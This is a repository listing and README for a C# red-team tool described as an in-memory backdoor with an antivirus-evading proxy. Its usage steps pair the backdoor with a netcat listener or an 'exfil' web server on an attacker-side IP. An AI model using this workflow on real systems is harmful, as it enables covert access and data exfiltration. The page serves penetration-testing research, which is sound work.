https://github.com/damonmohammadbagher/nativepayload_mp
C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
https://github.com/damonmohammadbagher/nativepayload_mp
antivirus antivirus-evasion bypass-antivirus pentesting proxy redteaming
Last synced: 30 days ago
JSON representation
C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
- Host: GitHub
- URL: https://github.com/damonmohammadbagher/nativepayload_mp
- Owner: DamonMohammadbagher
- Created: 2021-03-11T16:32:03.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-06T11:58:43.000Z (over 2 years ago)
- Last Synced: 2025-04-09T08:51:16.024Z (6 months ago)
- Topics: antivirus, antivirus-evasion, bypass-antivirus, pentesting, proxy, redteaming
- Language: C#
- Homepage:
- Size: 573 KB
- Stars: 5
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# NativePayload_MP
C# Memory Mapped File & Connection in-memory between Backdoor & Proxy Process
-------------------------NativePayload_MP.cs (old version, this code was as Mapper for working with NativePayload_MPAgent as backdoor in Memory only)
usage:
step1: NativePayload_MPAgent.exe
step2: NativePayload_MP.exe
--------------------------------------------NativePayload_MP1.cs (this code is Mapper/Proxy tool for working with NativePayload_HTTP.sh as web Exfil-server tool)
usage:
step1: [win] NativePayload_MPAgent.exe
step2: [linux:192.168.56.1] NativePayload_HTTP.sh -exfilwebserver 80
step3: [win] NativePayload_MP1.exe 192.168.56.1
--------------------------------------------
NativePayload_MP2.cs (this code is Mapper/Proxy tool for working with nc [Netcat])
usage:
step1: [win] NativePayload_MPAgent.exe
step2: [linux:192.168.56.1] nc -lp 443
step3: [win] NativePayload_MP2.exe 192.168.56.1 443
--------------------------------------------
NativePayload_MPAgent.cs (this code is our backdoor tool, working in memory only, without network connection)
usage:
step1: NativePayload_MPAgent.exe
---------------------------------------------
Article [1]: https://www.linkedin.com/pulse/memory-mapping-file-connection-in-memory-between-damon-mohammadbagher/Article [2]: https://damonmohammadbagher.github.io/Posts/10mar2021x.html
Video:
------------------------------------------------
NativePayload_MP1.cs (this code is Mapper/Proxy tool for working with NativePayload_HTTP.sh as web Exfil-server tool)
------------------------------------------------
NativePayload_MP.cs (old version, this code was as Mapper for working with NativePayload_MPAgent as backdoor in Memory only)
------------------------------------------------
NativePayload_MP2.cs (this code is Mapper/Proxy tool for working with nc [Netcat])